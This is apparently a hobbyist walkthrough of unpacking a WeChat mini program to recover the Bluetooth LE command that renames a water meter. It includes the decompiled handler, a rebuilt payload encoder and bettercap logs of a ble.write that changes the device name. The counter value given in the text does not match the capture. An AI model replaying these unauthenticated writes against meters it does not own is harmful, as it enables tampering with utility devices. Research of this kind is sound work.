Getting the mini program's source code
I used wxappUnpacker, but by the time I was writing this an rm branch had already been pushed ten days earlier.
- The master branch was not deleted, though, so we can still recover the tool.
First pull down the wxappUnpacker source.
➜ bilibili git clone https://github.com/qwerty472123/wxappUnpacker
Cloning into 'wxappUnpacker'...
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 297 (delta 0), reused 3 (delta 0), pack-reused 292
Receiving objects: 100% (297/297), 105.35 KiB | 168.00 KiB/s, done.
Resolving deltas: 100% (184/184), done.
- Switch to the master branch and you will see a lot more files appear.
➜ wxappUnpacker git:(rm) git checkout master
- Follow README.md: whatever package is reported missing, install it; after a few runs all the dependencies are in place.
npm install uglify-es
npm install js-beautify
npm install vm2
npm install esprima
npm install escodegen
npm install cssbeautify
npm install css-tree
- Copy the mini program's files from WeChat on the phone to the computer; they have the extension wxapkg.
Run node wuWxapkg.js <filename> to unpack the package.
In the unpacked code I then found this piece of test code:
// Tap handler from the unpacked page script (minified names kept as found):
// e is the page instance (this), t is the tap event, wx is the mini-program API.
var i = new ArrayBuffer(9),            // 9-byte payload that gets written to the meter
    c = new DataView(i),
    s = new Array(5),                  // receives the 6 ASCII digit bytes (indices 0..5)
    a = e.data.deviceName;
// Increment the current device name and store it back into page data.
a++, e.setData({
    deviceName: a
}),
// Split the number into six decimal digits, least significant first, as ASCII ('0' is 48).
s[5] = parseInt(a % 10) + 48, a /= 10, s[4] = parseInt(a % 10) + 48, a /= 10,
s[3] = parseInt(a % 10) + 48, a /= 10, s[2] = parseInt(a % 10) + 48, a /= 10, s[1] = parseInt(a % 10) + 48,
a /= 10, s[0] = parseInt(a) + 48, console.log(s);
// Per-write counter: flow + 1, wrapped at 256.
var o = e.data.flow;
o++, o %= 256, o = parseInt(o), e.setData({
    flow: o
}),
// Payload layout: 0x08, 0xC3, counter byte, then the six digit bytes.
c.setUint8(0, 8), c.setUint8(1, 195), c.setUint8(2, o), c.setUint8(3, s[0]),
c.setUint8(4, s[1]), c.setUint8(5, s[2]), c.setUint8(6, s[3]), c.setUint8(7, s[4]),
c.setUint8(8, s[5]),
// Write the buffer to the write characteristic (fec7) of the meter's service (fee7).
wx.writeBLECharacteristicValue({
    deviceId: t.currentTarget.dataset.id,
    serviceId: e.data.uuid,
    characteristicId: e.data.characteristic_write_uuid,
    value: i,
    success: function (e) {
        console.log("writeBLECharacteristicValue success: " + JSON.stringify(e));
    }
});
I then wrote a small mini program of my own that runs this code, and found that the water meter's device name had changed (the handler sends the current name incremented by one).
- From the code above: byte 1 is 8 (0x08), byte 2 is 195 (0xC3), byte 3 is o, which is (flow + 1) mod 256 and was 251 in my case; bytes 4 through 9 are the meter's device name as six ASCII digits. Concatenate these bytes and convert them to hex.
- Although 250 looks a lot like the meter's unit price, it did not change after I modified it, so I do not know what it means.
- serviceId:0000fee7-0000-1000-8000-00805f9b34fb
- characteristicId:0000fec7-0000-1000-8000-00805f9b34fb
To change the meter's device name to 666666, the write looks like this on the air:
Bluetooth Attribute Protocol
Opcode: Write Command (0x52)
0... .... = Authentication Signature: False
.1.. .... = Command: True
..01 0010 = Method: Write Request (0x12)
Handle: 0x0012 (Tencent Holdings Limited.: Apple, Inc.)
[Service UUID: Tencent Holdings Limited. (0xfee7)]
[UUID: Apple, Inc. (0xfec7)]
Value: 08 c3 00 36 36 36 36 36 36
- The six 0x36 bytes in Value are the hex ASCII code of the character '6'.
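The byte layout described above and the captured write, as an added example that is not code from the original post or from the mini program: it rebuilds the 9-byte payload the handler writes (0x08, 0xC3, the flow counter, six ASCII digits), frames it as the ATT Write Command that Wireshark dissected, and parses both back. The ATT opcode bit layout (bit 7 authentication signature flag, bit 6 command flag, low six bits the method) follows the Bluetooth Core specification; the handle 0x0012 is the one shown in the capture. The label "setName" for this command, the choice of flow value and the sample inputs are my own assumptions, not anything documented by the meter vendor.

```javascript
// Added example (not from the original post or the mini program). Rebuilds the
// 9-byte "setName" payload (my label for it), frames it as an ATT Write Command
// and decodes both the way Wireshark displays them.

const SET_NAME_HEADER = [0x08, 0xc3]; // fixed prefix observed in the capture
const ATT_WRITE_COMMAND = 0x52;       // method 0x12 (Write Request) | 0x40 (command bit)
const FEC7_HANDLE = 0x0012;           // handle of characteristic fec7 in the capture

// Build the payload exactly as the mini program does: the name is a number of at
// most 6 digits, zero-padded to six ASCII digits; the counter is (flow + 1) mod 256.
function buildSetNamePayload(name, flow) {
  if (!/^\d{1,6}$/.test(String(name))) {
    throw new RangeError("device name must be 1-6 decimal digits");
  }
  const digits = String(name).padStart(6, "0");
  const counter = (flow + 1) & 0xff;
  const buf = new Uint8Array(9);
  buf[0] = SET_NAME_HEADER[0];
  buf[1] = SET_NAME_HEADER[1];
  buf[2] = counter;
  for (let i = 0; i < 6; i++) buf[3 + i] = digits.charCodeAt(i); // '0'..'9' -> 0x30..0x39
  return buf;
}

function toHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join("");
}

function fromHex(hex) {
  if (hex.length === 0 || hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) {
    throw new RangeError("bad hex string");
  }
  return Uint8Array.from(hex.match(/../g), (h) => parseInt(h, 16));
}

// Frame the payload as the ATT PDU seen on the air: opcode, 16-bit little-endian
// attribute handle, attribute value. A Write Command gets no response from the peer.
function buildAttWriteCommand(handle, value) {
  const pdu = new Uint8Array(3 + value.length);
  pdu[0] = ATT_WRITE_COMMAND;
  pdu[1] = handle & 0xff;
  pdu[2] = (handle >> 8) & 0xff;
  pdu.set(value, 3);
  return pdu;
}

// Split a write PDU into the fields Wireshark shows: the opcode byte carries an
// authentication-signature bit (bit 7), a command bit (bit 6) and a 6-bit method,
// so "Write Command (0x52)" is "method 0x12 with the command bit set".
function parseAttWrite(pdu) {
  if (pdu.length < 3) throw new RangeError("ATT write PDU needs at least 3 bytes");
  const opcode = pdu[0];
  return {
    opcode,
    authSignature: (opcode & 0x80) !== 0,
    command: (opcode & 0x40) !== 0,
    method: opcode & 0x3f,
    handle: pdu[1] | (pdu[2] << 8),
    value: pdu.slice(3),
  };
}

// Interpret the 9-byte payload; anything that is not a setName packet is rejected.
function parseSetNamePayload(value) {
  if (value.length !== 9 || value[0] !== 0x08 || value[1] !== 0xc3) {
    throw new RangeError("not a setName payload");
  }
  const name = String.fromCharCode(...value.slice(3));
  if (!/^\d{6}$/.test(name)) throw new RangeError("name field is not six ASCII digits");
  return { counter: value[2], name };
}

// Usage: flow 255 wraps the counter to 0, reproducing the 00 in the captured write.
const payload = buildSetNamePayload("666666", 255);
const pdu = buildAttWriteCommand(FEC7_HANDLE, payload);
console.log(toHex(payload)); // hex string to paste into nRF Connect or bettercap ble.write
console.log(toHex(pdu));     // the ATT PDU as a sniffer would capture it
console.log(parseSetNamePayload(parseAttWrite(pdu).value));
```

buildSetNamePayload zero-pads short names the same way the handler's repeated divide-by-ten does, and refuses anything longer than six digits, which the original code would silently corrupt because parseInt(a) of the leftover would exceed one digit.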
Changing the water meter's device name
- On a phone you can use the nRF Connect app; it makes this kind of debugging very convenient.
- After connecting to the device, expand its services, tap the upload (write) button on characteristic fec7, paste the hex string from above and tap send.
- On a computer you can send the same bytes with bettercap's ble.write:
➜ wxappUnpacker git:(master) ✗ sudo bettercap
bettercap v2.26.1 (built for linux amd64 with go1.13.4) [type 'help' for a list of commands]
10.196.66.0/25 > 10.196.66.5 »
10.196.66.0/25 > 10.196.66.5 » ble.recon on
10.196.66.0/25 > 10.196.66.5 » [09:51:34] [ble.device.new] new BLE device detected as 7E:BD:F7:4B:93:A0 (Apple, Inc.) -82 dBm.
10.196.66.0/25 > 10.196.66.5 » [09:51:34] [ble.device.new] new BLE device detected as 3D:2B:6B:3C:9B:BE (Microsoft) -68 dBm.
10.196.66.0/25 > 10.196.66.5 » [09:51:34] [ble.device.new] new BLE device 777777 detected as 78:DB:2F:13:70:E6 (Fugoo, Inc.) -84 dBm.
10.196.66.0/25 > 10.196.66.5 » ble.show
┌─────────┬───────────────────┬─────────────┬──────────────────────────────────────────────┬─────────┬──────────┐
│ RSSI ▴ │ MAC │ Vendor │ Flags │ Connect │ Seen │
├─────────┼───────────────────┼─────────────┼──────────────────────────────────────────────┼─────────┼──────────┤
│ -73 dBm │ 3d:2b:6b:3c:9b:be │ Microsoft │ │ ✖ │ 09:51:42 │
│ -75 dBm │ 7e:bd:f7:4b:93:a0 │ Apple, Inc. │ LE + BR/EDR (controller), LE + BR/EDR (host) │ ✔ │ 09:51:42 │
│ -85 dBm │ 78:db:2f:13:70:e6 │ Fugoo, Inc. │ BR/EDR Not Supported │ ✔ │ 09:51:42 │
└─────────┴───────────────────┴─────────────┴──────────────────────────────────────────────┴─────────┴──────────┘
10.196.66.0/25 > 10.196.66.5 » ble.enum 78:DB:2F:13:70:E6
[09:51:59] [sys.log] [inf] ble.recon connecting to 78:db:2f:13:70:e6 ...
10.196.66.0/25 > 10.196.66.5 »
┌──────────────┬───────────────────────────────────────────────────────┬────────────┬─────────────────────────────────────────────────┐
│ Handles │ Service > Characteristics │ Properties │ Data │
├──────────────┼───────────────────────────────────────────────────────┼────────────┼─────────────────────────────────────────────────┤
│ 0001 -> 000b │ Generic Access (1800) │ │ │
│ 0003 │ Device Name (2a00) │ READ │ 777777 │
│ 0005 │ Appearance (2a01) │ READ │ Unknown │
│ 0007 │ Peripheral Privacy Flag (2a02) │ READ │ Privacy Disabled │
│ 0009 │ Reconnection Address (2a03) │ WRITE │ │
│ 000b │ Peripheral Preferred Connection Parameters (2a04) │ READ │ Connection Interval: 80 -> 160 │
│ │ │ │ Slave Latency: 0 │
│ │ │ │ Connection Supervision Timeout Multiplier: 1000 │
│ │ │ │ │
│ 000c -> 000f │ Generic Attribute (1801) │ │ │
│ 000e │ Service Changed (2a05) │ INDICATE │ │
│ │ │ │ │
│ 0010 -> ffff │ fee7 │ │ │
│ 0012 │ fec7 │ WRITE │ │
│ 0015 │ fec8 │ NOTIFY │ │
│ 0019 │ fec9 │ READ │ xÛ/13pæ │
│ │ │ │ │
└──────────────┴───────────────────────────────────────────────────────┴────────────┴─────────────────────────────────────────────────┘
10.196.66.0/25 > 10.196.66.5 » help ble.recon
ble.recon (running): Bluetooth Low Energy devices discovery.
ble.recon on : Start Bluetooth Low Energy devices discovery.
ble.recon off : Stop Bluetooth Low Energy devices discovery.
ble.clear : Clear all devices collected by the BLE discovery module.
ble.show : Show discovered Bluetooth Low Energy devices.
ble.enum MAC : Enumerate services and characteristics for the given BLE device.
ble.write MAC UUID HEX_DATA : Write the HEX_DATA buffer to the BLE device with the specified MAC address, to the characteristics with the given UUID.
Parameters
ble.device : Index of the HCI device to use, -1 to autodetect. (default=-1)
ble.show.filter : Defines a regular expression filter for ble.show (default=)
ble.show.limit : Defines limit for ble.show (default=0)
ble.show.sort : Defines sorting field (rssi, mac, seen) and direction (asc or desc) for ble.show (default=rssi asc)
ble.timeout : Connection timeout in seconds. (default=5)
ble.ttl : Seconds of inactivity for a device to be pruned. (default=30)
10.196.66.0/25 > 10.196.66.5 » ble.write 78:DB:2F:13:70:E6 fec7 08c300363636363636
[09:53:01] [sys.log] [inf] ble.recon connecting to 78:db:2f:13:70:e6 ...
10.196.66.0/25 > 10.196.66.5 » ble.enum 78:DB:2F:13:70:E6
[09:54:48] [sys.log] [inf] ble.recon connecting to 78:db:2f:13:70:e6 ...
10.196.66.0/25 > 10.196.66.5 »
┌──────────────┬───────────────────────────────────────────────────────┬────────────┬─────────────────────────────────────────────────┐
│ Handles │ Service > Characteristics │ Properties │ Data │
├──────────────┼───────────────────────────────────────────────────────┼────────────┼─────────────────────────────────────────────────┤
│ 0001 -> 000b │ Generic Access (1800) │ │ │
│ 0003 │ Device Name (2a00) │ READ │ 666666 │
│ 0005 │ Appearance (2a01) │ READ │ Unknown │
│ 0007 │ Peripheral Privacy Flag (2a02) │ READ │ Privacy Disabled │
│ 0009 │ Reconnection Address (2a03) │ WRITE │ │
│ 000b │ Peripheral Preferred Connection Parameters (2a04) │ READ │ Connection Interval: 80 -> 160 │
│ │ │ │ Slave Latency: 0 │
│ │ │ │ Connection Supervision Timeout Multiplier: 1000 │
│ │ │ │ │
│ 000c -> 000f │ Generic Attribute (1801) │ │ │
│ 000e │ Service Changed (2a05) │ INDICATE │ │
│ │ │ │ │
│ 0010 -> ffff │ fee7 │ │ │
│ 0012 │ fec7 │ WRITE │ │
│ 0015 │ fec8 │ NOTIFY │ │
│ 0019 │ fec9 │ READ │ xÛ/13pæ │
│ │ │ │ │
└──────────────┴───────────────────────────────────────────────────────┴────────────┴─────────────────────────────────────────────────┘